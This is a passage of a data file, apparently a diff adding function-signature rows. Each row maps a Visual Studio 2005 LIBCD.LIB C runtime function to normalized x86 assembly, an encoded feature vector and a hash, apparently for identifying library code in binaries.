SS:[EBP+CONST]",yCGT8gAAAAAAAAAA,WJdLYJs5GW9AKwe6Oo27l8LUkzUSWReG+Hf5wfQp7ggAAAAA9CnuCJyGUTgAAAAARPMkz16jgyf+JFwD9CnuCJyGUTgAAAAAnIZROMLUkzUSWReGg65DXiVFNORvcIwNElkXhsLUkzXofidMDpXpTJZz8F/0Ke4IsAaWVQ6V6UychlE4/iRcA4OuQ14AAAAAbEosAZyGUTichlE4nIZROJyGUTichlE46H4nTNacJILofidMXqODJ7AGllUAAAAAnIZROJyGUTichlE49CnuCJyGUTgAAAAAlnPwX5yGUTgAAAAAnIZROPQp7gj4d/nBnIZROJyGUTichlE46H4nTMLUkzXWnCSCnIZROA6V6UzxZLvOnIZROGZ5MTXxZLvOqf+9TJyGUTgAAAAAXqODJ7AGllUAAAAAg65DXgmX7pxeo4Mn8WS7zmZ5MTUAAAAA1pwkghnzF9YAAAAADpXpTEFF0But/Rq5DpXpTCKUXPMOlelMZnkxNU+LzAoAAAAACZfunMFP/SeDrkNenIZROJyGUTibORlvrf0auUFF0BsAAAAADpXpTJyGUTgOlelMmzkZb+h+J0z0Ke4IQUXQG0+LzAoAAAAAT4vMCgAAAAAAAAAAmzkZb5s5GW+p/71MwtSTNRnzF9YAAAAADpXpTA6V6UyLDRRMb3CMDSVFNOTBT/0nK572jhnzF9YAAAAAiw0UTCKUXPMOlelM9CnuCJyGUTgAAAAAGfMX1kTzJM/MByxQ6H4nTPQp7gjofidMDpXpTJyGUTiLDRRMwU/9Jyue9o4AAAAAiw0UTJyGUTgilFzz6H4nTDqNu5f0Ke4IGfMX1ps5GW9AKwe6zAcsUIOuQ14AAAAAJUU05Cue9o4AAAAAQCsHuhnzF9YAAAAAIpRc8w6V6Uz0Ke4I9CnuCJyGUTgAAAAA8WS7zg6V6UwAAAAAmzkZb5yGUThsSiwB,300effbe9e8d6bd80d7fcc98436b02b9f2a59c8c,VS2005,LIBCD.LIB
+_printf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32",nIZROORSvJ+S9NEBdYMGr5yGUTho27TX5FK8n5yGUTho27TXkvTRAeRSvJ91gwavaNu01wAAAAAAAAAAmY/2juRSvJ+S9NEB,[],95de435063a8d76e4007791647b0f2353590d6a4,VS2005,LIBCD.LIB
+___set_app_type,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[0],R32\nPOP EBP\nRETN",0SFUiAAAAAAAAAAA,[],61c267acf3330dd3e20bbeb3994b4b6917a16944,VS2005,LIBCD.LIB
+__set_error_mode,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",nIZROHac/Zpeo4Mn4HgnVAAAAAAAAAAASzUXYeB4J1SchlE4XqODJ+B4J1QAAAAA1RzUtgAAAAAAAAAAAWlURNUc1LYAAAAAnIZROAFpVESchlE4dpz9mtUc1LYAAAAA,[],b6177a64075280b8883381b015698d2653cab5ea,VS2005,LIBCD.LIB
+__wcsncoll,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",DczAAU+LzAoAAAAAJgwaito3INomTrz7JAPDnSYMGood0S+s2jcg2k+LzAoAAAAAT4vMCgAAAAAAAAAAJk68+0+LzAoAAAAAjLRRTiQDw50NzMABHdEvrE+LzAoAAAAA,[],51fac7a84a031828027fa67312498842a1ef2dbc,VS2005,LIBCD.LIB
+__allshr,"MOV R32,R32\nSAR R32,CONST\nAND R8,CONST\nSAR R32,R8\nRETN",jZfqvwAAAAAAAAAAW9AV4EFrIHlb0BXg776pCwAAAAAAAAAAQWsgeQAAAAAAAAAAW9AV4O++qQuNl+q/,[],ac47381379ffe99b098c5e9d0b978b6f2f1aa74a,VS2005,LIBCD.LIB
+__AdjustStack,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",PsqG2YOuQ14AAAAAvcXAfJyGUTj0Ke4Ig65DXl6jgyf7IOEE+yDhBD7KhtkAAAAAXqODJ0+LzAoAAAAAT4vMCgAAAAAAAAAAnIZROE+LzAr45qJ99CnuCIOuQ14AAAAA+OaifU+LzAoAAAAA,[],538c90ca76149bddc464a227654e241f300261ad,VS2005,LIBCD.LIB
+__FillOperand,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]",wZugLgAAAAAAAAAA7WmErcSg0gnBm6AuxKDSCQAAAAAAAAAA,[],2135dc6edb66626ce9742db2f54c33974f287685,VS2005,LIBCD.LIB
+__GetFpRegVal,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32]",ZhrdmrXFuSuchlE4glJpXk+LzAoAAAAAtcW5KwAAAAAAAAAAT4vMCgAAAAAAAAAAnIZROLXFuSuCUmle,[],eb05894fc31d55f9669260dc00a5e9a3a5c51b0e,VS2005,LIBCD.LIB
+__fpieee_flt,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32]\nPUSH R32\nCALL DWORD PTR SS:[EBP+CONST]\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],-1\nJCC CONST",XqODJ3hXIbEAAAAAKpGs1ijIMFVeo4MnO5MDwYfZYo/ZOL9Zr3O5ytk4v1kAAAAAIPZcz4fZYo/ZOL9ZyFJf13hXIbEAAAAAKpGs1pXM31sqkazWIHM2mHhXIbEAAAAA2Ti/Wa9zucpbACoXlczfW3hXIbEAAAAAWwAqF9k4v1kAAAAA2Ti/WYfZYo9VtVaSKMgwVfwQ6cEqkazWeFchsfwQ6cEqkazWVbVWkpy8PYEAAAAAr3O5ytk4v1kAAAAAiw0UTMmwPeiLDRRMh9lijz3kskzZOL9Ziw0UTMmwPehmeTE12Ti/WdNslTJbACoXnLw9gT3kskzZOL9ZtxoF1cuCy5WaTVvPZnkxNcSg0gkAAAAAWwAqF5U7MgYAAAAAKpGs1shSX9deo4MnXqODJ3hXIbEAAAAAXqODJ/y/t7sAAAAAyFJf1/y/t7sAAAAA02yVMpU7MgYAAAAA2Ti/WT3kskxVtVaSlczfW/y/t7sAAAAAlTsyBkFF0BsAAAAAVbVWkiaB7UIAAAAA/BDpwQ4iwBEOlelMQUXQG8Sg0gkAAAAAPeSyTM3cS3XZOL9ZxKDSCQAAAAAAAAAAJoHtQs3cS3XZOL9Zmk1bz8uCy5UAAAAAac0GAEFF0Bs0YY742Ti/Wc3cS3VVtVaSNGGO+Nmn1Wg70T3zy4LLlcSg0gkAAAAAVbVWkjol8hcAAAAArbco4FnwAUS037QKo2O5qsmwPeiLDRRMzdxLdTol8hcAAAAAOiXyF0aSTvJgEQ9ZtN+0CuRSvJ/XtPZD17T2Q+RSvJ87j6vlO9E98wAAAAAAAAAAYBEPWYa3U08AAAAAO4+r5eRSvJ8AAAAA5FK8n7TftApmeTE1ZnkxNcSg0gkAAAAAWfABRCqRrNYqkazWRpJO8oa3U08AAAAAhrdTT0aSTvJgEQ9Z2afVaNCXBG+LDRRMybA96K23KOC3GgXVYBEPWYa3U08AAAAAiw0UTMmwPeiLDRRMiw0UTNCXBG+LDRRMiw0UTOezaOZeo4MnRpJO8oa3U08AAAAAXqODJw6V6UwAAAAA0JcEbw6V6UwAAAAA0JcEbw6V6UwAAAAAhrdTT0aSTvJgEQ9Z/L+3uw4iwBEOlelM57No5g6V6UwAAAAAiw0UTMmwPeiLDRRMDpXpTK9zucpbACoXYBEPWQ4AXxwAAAAAWwAqF6VT2c4AAAAARpJO8g4AXxwAAAAAr3O5yqVT2c4AAAAADpXpTA4iwBFVtVaSVbVWkguMPQ0AAAAADgBfHGnNBgA70T3zpVPZztNslTJbACoXDiLAETuTA8GlU9nOWwAqF9k4v1kAAAAAC4w9DTuTA8GlU9nO02yVMtk4v1kAAAAAKpGs1pXM31uLDRRMiw0UTMhSX9cqkazWO9E98wAAAAAAAAAApVPZzjuTA8FVtVaS2Ti/Wa9zucpK625xKpGs1iBzNpheo4MnVbVWkiD2XM8AAAAASutucdk4v1kAAAAA,[],2d04d00978bf3a6d2a27fd8299e3546fd520e7f7,VS2005,LIBCD.LIB
+__AdjustLocation,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",lnPwX16jgycAAAAAnIZROBdP+qheo4MnXqODJ/h3+cEAAAAAXqODJ9Uc1LYAAAAA+Hf5wdUc1LYAAAAAF0/6qJZz8F+chlE41RzUtgAAAAAAAAAASzUXYfh3+cGchlE4nIZROF6jgyeWc/Bf,[],faa67935b83a41ba05d5ec3b54514bcec69d1cae,VS2005,LIBCD.LIB
+__SetTag,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSHL R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV CONST2,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]",f2r07gAAAAAAAAAA,[],2b5dcc8ecfb81ff1c5dcfaaccf6b4959a99c6745,VS2005,LIBCD.LIB
+__UpdateFpCtxt,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",FHyi3QDh1muNqU/qcMiU5LJyR8UUfKLdsnJHxQDh1muNqU/qAOHWawAAAAAAAAAAjalP6gDh1msAAAAA,[],a4e4ce1b367f7acc8de887f4db0403aca9a2128d,VS2005,LIBCD.LIB
+__SetFpRegVal,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32]",iw0UTPQp7gheo4MnlnPwX16jgycAAAAAXqODJ5Zz8F8AAAAAg65DXpZz8F8p2auwXqODJ5tSPnQAAAAA9CnuCJtSPnQAAAAAk1GKok+LzAppzQYAKdmrsJZz8F/0Ke4IT4vMCgAAAAAAAAAAlnPwX5tSPnQAAAAAac0GAE+LzAqKXTvd9CnuCF6jgycAAAAAm1I+dAAAAAAAAAAAil073YOuQ16LDRRM,[],d983493559e03927a2be6ea4e495e0601d0bd566,VS2005,LIBCD.LIB
+__IsMemoryLocation,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",T4vMCgAAAAAAAAAAnIZROJdxUZ5eo4MnXqODJybu4WUAAAAAl3FRnk+LzAoAAAAAJu7hZU+LzAoAAAAA1hmIcSbu4WWchlE4,[],861e66ffbbb241cb49b9fa55f18849bc7ac71a52,VS2005,LIBCD.LIB
+__UpdateResult,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32",tqCaPQAAAAAAAAAAxKDSCQAAAAAAAAAA+FbIYMSg0gm2oJo9,[],5a4cf75aeeb79579c80c8a50231dd54c725bae85,VS2005,LIBCD.LIB
+__tolower,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nPOP EBP\nRETN",cq9OeAAAAAAAAAAA,[],642da5e47969c4995b0c6964550ab43ee163c329,VS2005,LIBCD.LIB
+_tolower,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",T4vMCgAAAAAAAAAA6BNEg5yGUTgAAAAAoDc6oU+LzAoAAAAAiw0UTAwS5f8kA8Ody8zSJU+LzAoAAAAAnIZROMuCy5WchlE4qFxrs0+LzAoAAAAAUlP1iJyGUTigNzqhDBLl/6x/2U47hZT8JAPDnegTRIPs+e7FO4WU/FJT9YgAAAAANvQ/7U+LzAoAAAAArH/ZTpyGUTigNzqh7PnuxZyGUTgAAAAAEIVrf4sNFEychlE4nIZROKhca7PLzNIly4LLlU+LzAoAAAAAnIZROMuCy5U29D/ty4LLlU+LzAoAAAAAnIZROAwS5f/LgsuV,[],2e0ecbb095c1dcc4b1f5d5c493b2fccbcbd8a9f4,VS2005,LIBCD.LIB
+_fgets,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],-1",nIZROORSvJ+S9NEBkvTRAeRSvJ91gwav90+BLcB7xSiDrkNe9CnuCEFF0BsAAAAAnIZROORSvJ+S9NEBg65DXl6jgyf0Ke4IdYMGr5yGUTichlE45FK8n5yGUTichlE4nIZROGhXTJNmeTE1ZnkxNcSg0gkAAAAAXqODJyi7oqkAAAAAwHvFKDUWchNeo4MnaFdMkyi7oqmntFwkIZK58yi7oqmntFwkcgYNJORSvJ+S9NEBQUXQG8Sg0gkAAAAAXqODJyi7oqkAAAAAp7RcJPdPgS25beHXNRZyEyGSufMAAAAAKLuiqcSg0gkAAAAAkvTRAeRSvJ91gwavxKDSCQAAAAAAAAAAuW3h14p3DJgAAAAAincMmMB7xSiDrkNedYMGr5yGUTichlE45FK8n5yGUTichlE4,[],dff3b5f7a6350bcf76165dc81f8744217bb445c3,VS2005,LIBCD.LIB
+__flswbuf,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",5DNlCphQxdKLDRRMMekEoDHpBKBZ9a9eSB7rOMSg0gkAAAAArJIE4+RSvJ/b6hIUnIZROJZz8F+uDSSPg65DXtQn+1gyQF5qWfWvXsSg0gkAAAAArg0kj2QVua0AAAAAMkBeasSg0gkAAAAA2+oSFORSvJ87j6vlMekEoOQzZQq7/ODb1Cf7WMSg0gkAAAAAlnPwX2QVua0AAAAAma5ZK5yGUTgAAAAAZBW5rSry0VzYohxru/zg20ge6zjhGvN9O4+r5eRSvJ8AAAAA5FK8n6ySBON4S6ronIZROORSvJ+S9NEBeEuq6JyGUThs4A7xkvTRAeRSvJ87j6vl2KIcayry0VwAAAAAiw0UTC8CckKLDRRMxKDSCQAAAAAAAAAA4RrzfeQzZQoAAAAAiw0UTJ+/4/kvAnJCKvLRXIOuQ14AAAAALwJyQphQxdKfv+P5O4+r5eRSvJ8AAAAA5FK8n5yGUTjxDCV68Qwleln1r14x6QSgn7/j+ZhQxdIAAAAAhIeYOoOuQ14AAAAAbOAO8Sry0VwAAAAAmFDF0oSHmDqskgTj,[],0275fb3fd5645d97c15f84c42ee8ebd2bc914eca,VS2005,LIBCD.LIB
+__umask,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR SS:[EBP+CONST],R32",XA8gnwAAAAAAAAAA,[],d9a3151e6455d60b032ff80f22417e82f6f71091,VS2005,LIBCD.LIB
+__isatty,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSAR R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR DS:[R32*4]\nMOVSX R32,BYTE PTR DS:[R32+R32*8+CONST]\nAND R32,CONST",LDIyWgDh1msAAAAAAOHWawAAAAAAAAAADczAAQDh1msAAAAA5p0HmywyMloNzMAB,[],549d6ae6159b272ea56b649fc6d06b900502d2dd,VS2005,LIBCD.LIB
+__nh_malloc_base,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",XqODJ5yGUTgAAAAAnIZROC8CckJBRdAbT4vMCgAAAAAAAAAAwEFAl5yGUTgAAAAAQUXQG16jgycAAAAAXqODJ0+LzAoAAAAALwJyQl6jgycNzMABjLRRTpyGUTgNzMABlnPwX5yGUTgAAAAADczAAU+LzAoAAAAAnIZROEFF0BuchlE4DczAAU+LzAoAAAAAnIZROJZz8F/AQUCX,[],3039d314d7638e448f56817fa89d4c20f085fba6,VS2005,LIBCD.LIB
+__malloc_base,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",9oipFQAAAAAAAAAA,LwJyQl6jgycNzMABjLRRTpyGUTgNzMABlnPwX5yGUTgAAAAADczAAU+LzAoAAAAAnIZROKA3OqGchlE4DczAAU+LzAoAAAAAnIZROJZz8F/AQUCXXqODJ5yGUTgAAAAAnIZROC8CckKgNzqhT4vMCgAAAAAAAAAAwEFAl5yGUTgAAAAAoDc6oU+LzAoAAAAA,2fc61da672ca4c30ff261d8cab6358f4c7e235dd,VS2005,LIBCD.LIB
+__heap_alloc_base,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",QwR9VpyGUThPq8wcoDc6oU+LzAoAAAAAnIZROM36cA6Wc/BfT6vMHJyGUTigNzqhlnPwX836cA4AAAAAT4vMCgAAAAAAAAAAzfpwDk+LzAoAAAAA,[],783a14f0071f73c47d52098ee6ae20eac9281ec6,VS2005,LIBCD.LIB
+__CrtSetReportHook,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[0],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",sAsYHAAAAAAAAAAA,[],2c7df1dc9055df7b5e996e1e2252f92905124a28,VS2005,LIBCD.LIB
+__CrtDbgBreak,"PUSH EBP\nMOV EBP,ESP\nCALL DWORD PTR DS:[0]\nPOP EBP\nRETN",JQZ0sQAAAAAAAAAA,[],7121ee3147c65982419ca5463b049c0d84c4bf1c,VS2005,LIBCD.LIB
+__CrtDbgReport,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32*4]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",aiWA2pyGUTh/oubgkeWw0meknu7S+czkJGEUYy1GnW8UAFMsXqODJyQDw50AAAAAZ6Se7svPGP723oTNXdVSvmeknu79suVPJx2GxepfMdSvJ1dcFqiAZi1GnW8UAFMs9t6EzV3VUr7j9UVuJAPDnepfMdRcg261JAPDnWeknu79suVPf6Lm4JyGUTgAAAAA/bLlT2eknu6chlE4vuWjPpyGUTgkA8OdrydXXC+iRdUAAAAAy88Y/l3VUr7j9UVuZ6Se7meknu7S+czknIZROGtA4HCchlE46l8x1C+iRdUAAAAAnIZROM3cS3VVtVaSFABTLC+iRdUAAAAAnIZROGnNBgCvJ1dc4/VFbl6jgycAAAAAnIZROF3VUr7j9UVu0vnM5JyGUTichlE4rydXXC+iRdUAAAAALUadby+iRdUAAAAAnIZROEbzbFt/taIYzdxLdRMA5/kAAAAAac0GAJyGUTi+5aM+nIZROCbu4WWSHTkQZ6Se7pyGUTichlE4kh05EC+iRdUAAAAAEwDn+WtA4HAAAAAAY1bYMK8nV1ychlE4RvNsWy+iRdUAAAAAJu7hZS+iRdUAAAAAnIZROCRhFGPsMjqPL6JF1QAAAAAAAAAAZ6Se7meknu51v21W7DI6jxaogGYAAAAAVbVWkhMA5/kAAAAAa0DgcJyGUThnpJ7uf7WiGC+iRdUAAAAAXINuta8nV1wnHYbFdb9tVmeknu6R5bDSnIZROJyGUThqJYDa,[],12408ee257c41dedd8ca59cbbb7c47ed76f00e37,VS2005,LIBCD.LIB
+__CrtSetReportMode,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",DpXpTEqZR53EkqZonIZROJyGUTjEkqZoxJKmaE+LzAoAAAAAxJKmaE+LzAoAAAAAT4vMCgAAAAAAAAAAnIZROA6V6Uy5vHHwSplHnU+LzAoAAAAAubxx8E+LzAoAAAAAjLRRTsSSpmichlE4,[],a60453c8eab429a1d49c964c9a9530190fced6e9,VS2005,LIBCD.LIB
+__CrtSetReportFile,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",l3FRnk+LzAoAAAAA5pcs8EFF0BsAAAAAnIZROBAObQK5vHHwT4vMCgAAAAAAAAAAnIZROBbgqm3mlyzwFuCqbUFF0BsAAAAAubxx8E+LzAoAAAAAjLRRTpdxUZ6chlE4QUXQG0+LzAoAAAAA5pcs8EFF0BsAAAAAEA5tApyGUTjmlyzwnIZROJyGUTiXcVGe,[],d242ec926ac0f55e07ed37fb6c214a46dab6073a,VS2005,LIBCD.LIB
+_strncpy,"MOV R32,CONST\nMOV R32,DWORD PTR DS:[R32]\nADD R32,R32\nXOR R32,CONST\nXOR R32,R32\nMOV R32,DWORD PTR DS:[R32]\nADD R32,CONST\nTEST R32,CONST",WNooOvBXuNctDNr2u7ZcLIGGgcJNYxDdLQza9ibu4WWBhoHCTWMQ3QAAAAAAAAAAgYaBwpfae5QAAAAAl9p7lIGGgcJZ3Yd2AcDPEENQbiQ9pCW9Wd2HdkNQbiQAAAAAQ1BuJAAAAAAAAAAAiIgyDru2XCwJZjbUCWY21IiIMg7YzQSmPaQlvTm7ld67tlwsu7ZcLAlmNtReo4MnXqODJ3as6uwAAAAAObuV3k1jEN3YzQSm2M0EpgAiwtXYzQSm2M0EpljaKDpY2ig62M0EpgqI+jZY2ig6WNooOjm7ld4tDNr2WNooOgqI+jZY2ig6LQza9glmNtS7tlwsWNooOoiIMg5F33qQu7ZcLE1jEN12rOrsRd96kIZpg1IAAAAAdqzq7Jfae5SX2nuUCoj6NoZpg1IAAAAAl9p7lHas6uxNYxDdCoj6NoZpg1IAAAAATWMQ3QAAAAAAAAAAWNooOi0M2vbwV7jXACLC1YZpg1IAAAAAhmmDUru2XCwm7uFl8Fe4101jEN1Y2ig6Ju7hZYiIMg4AAAAAiIgyDoiIMg67tlws,[],ab6426e64c79771538fe9c2f6ceb9f843d06e06b,VS2005,LIBCD.LIB
+_ldexp,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nFLD QWORD PTR SS:[EBP+CONST]\nFMUL QWORD PTR DS:[0]\nSUB ESP,CONST\nFSTP QWORD PTR SS:[ESP]\nFILD DWORD PTR SS:[EBP+CONST]\nFSTP QWORD PTR SS:[EBP+CONST]",Zopx2I2gHmzeJIIpg8UxCgAAAAAAAAAAiw0UTIsNFEySwpRlksW8ME+LzAoAAAAAksKUZU+LzAoAAAAAK+VguOr87jZxWpQ6YiEKRIsNFEwAAAAAiw0UTOr87jZxWpQ63iSCKZLFvDCchlE4cVqUOosNFEwAAAAAiw0UTIPFMQr5d2VRT4vMCgAAAAAAAAAA6vzuNosNFEwAS5a5+XdlUU+LzAoAAAAAiw0UTIsNFEwAS5a5nIZROIbL2O+chlE4AEuWuU+LzAoAAAAAnIZROLSpEOteo4MnjaAebI+/AZGGy9jvXqODJ5LFvDAAAAAAhsvY70+LzAoAAAAAhsvY70+LzAoAAAAAtKkQ60+LzAoAAAAAiw0UTIsNFEySxbwwksW8ME+LzAoAAAAAj78BkSvlYLhiIQpE,[],e1bec1baf2f39b3bd5f290bf1c4e9d3b93808b2b,VS2005,LIBCD.LIB
+__spawnle,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",A2oHmQAAAAAAAAAApBdjb+RSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTikF2Nv5FK8n6QXY29Of7zKkvTRAeRSvJ87j6vlXqODJ0G4PzQAAAAAO4+r5eRSvJ8AAAAApBdjb+RSvJ+S9NEBkvTRAeRSvJ87j6vlTn+8ykG4PzQAAAAAO4+r5eRSvJ8AAAAA5FK8n6QXY2+chlE4kvTRAeRSvJ87j6vlQbg/NANqB5leo4MnnIZROORSvJ+S9NEBxhVotpyGUTgAAAAAO4+r5eRSvJ8AAAAA5FK8n5yGUTikF2NvkvTRAeRSvJ87j6vlnIZROORSvJ+S9NEB,[],116340723e47fe32d7de188df03781f6946237cb,VS2005,LIBCD.LIB
+__fullpath,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR DS:[0],CONST\nXOR R32,R32\nJMP SHORT CONST",nIZROPh3+cE1dZFUpBdjb5yGUTgrieMfnIZROLzzLWTnEgC4QUXQG0+LzAoAAAAAnIZROI7ewlBo6LBJT4vMCgAAAAAAAAAAaOiwSU+LzAoAAAAAK4njH0+LzAoAAAAAvPMtZE+LzAoAAAAA5xIAuE+LzAoAAAAAjt7CUE+LzAoAAAAA+Hf5wZCykekAAAAAVaatKCuJ4x+kF2Nv9CnuCJCykekAAAAAkLKR6ZyGUTichlE4nIZROEFF0BuchlE4NXWRVPQp7gi88y1kvPMtZE+LzAoAAAAA,[],f25c673297b316fe4b810c8b89902593378a0405,VS2005,LIBCD.LIB
+_floor,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nFSTP QWORD PTR SS:[EBP+CONST]\nFLD QWORD PTR SS:[EBP+CONST]",hsvY70+LzAoAAAAAT4vMCgAAAAAAAAAAnIZROIbL2O+chlE4q3mYAk+LzAoAAAAA7X4p20+LzAoAAAAA7X4p20+LzAoAAAAAnIZROC+Eexleo4Mn3iSCKSLy+gCchlE4DpXpTKt5mALtfinbXqODJyLy+gAAAAAAR8k3yw6V6UztfinbL4R7GU+LzAoAAAAAIvL6AE+LzAoAAAAAy0daakfJN8veJIIp,[],0347ca634e8b11228637c0b237bb412c569d12b8,VS2005,LIBCD.LIB
+__dup2,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",LwJyQoOuQ14eGLo5BmKIw1vqZy5bs5fnZnkxNU+LzAoAAAAAbGYbnJyGUTgAAAAAnIZROL6Ld/mZeO5viw0UTO6IrP7opF1oBmKIw+ikXWiLDRRMmXjub0+LzAoAAAAA7ois/oOuQ14vAnJCiOxhU5yGUTgAAAAAT4vMCgAAAAAAAAAA6KRdaE+LzAoAAAAAHhi6OU+LzAoAAAAAW+pnLojsYVNsZhuc7bLtN+ikXWgGYojDg65DXgZiiMNmeTE1W7OX54jsYVNsZhucvot3+U+LzAoAAAAA,[],ec052a9cc0169c0b07418e2c5f7d90853420e75e,VS2005,LIBCD.LIB
+__allshl,"MOV R32,R32\nXOR R32,R32\nAND R8,CONST\nSHL R32,R8\nRETN",jZfqvwAAAAAAAAAAW9AV4MR0sE9b0BXgxHSwTwAAAAAAAAAA5EobvwAAAAAAAAAAW9AV4ORKG7+Nl+q/,[],5f3092b9b4b64edbceecd85ac510b289a4f92f78,VS2005,LIBCD.LIB
+_fscanf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32",nIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTichlE4kvTRAeRSvJ87j6vlnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTgcY9GLkvTRAeRSvJ87j6vlZWXpEZyGUTgAAAAAHGPRiwAAAAAAAAAA,[],438c003b5e353e9f9a1ce16686b38ab6f7670a7b,VS2005,LIBCD.LIB
